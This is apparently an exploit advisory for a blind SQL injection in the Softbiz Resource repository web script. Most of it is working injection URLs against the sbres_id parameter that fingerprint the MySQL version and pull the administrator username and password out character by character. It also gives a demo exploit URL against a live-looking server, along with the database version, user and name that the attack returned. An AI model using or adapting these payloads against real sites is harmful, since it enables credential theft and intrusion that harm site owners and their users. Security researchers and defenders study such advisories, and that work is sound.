$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $Softbiz Resource repository script Blind SQL Vulnerability(Normal version) $Author : Sangteamtham $Home: Hcegroup.net & vnbrain.net $Download :http://www.softbizscripts.com/FAQ-script-features.php $ $****************************************************************************************** $ $ check version : /resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=4 $/resource/details_res.php?sbres_id=[id number]+and substring(version(),1,1)=5 $/resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/* $ /resource/details_res.php?sbres_id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/* $note: password_column,username_column,admin_info_table depend on the database installed $*********************************************************** $ Demo: $ In the demo site : $ $ Exploit: $ http://server/resource/details_res.php?sbres_id=121%20and%20substring(@@version,1,1)=5 $ MySQL version: 5.0.81-community $ User: softbiz_kuber@localhost $ Dataabase: softbiz_resource
体验盒子
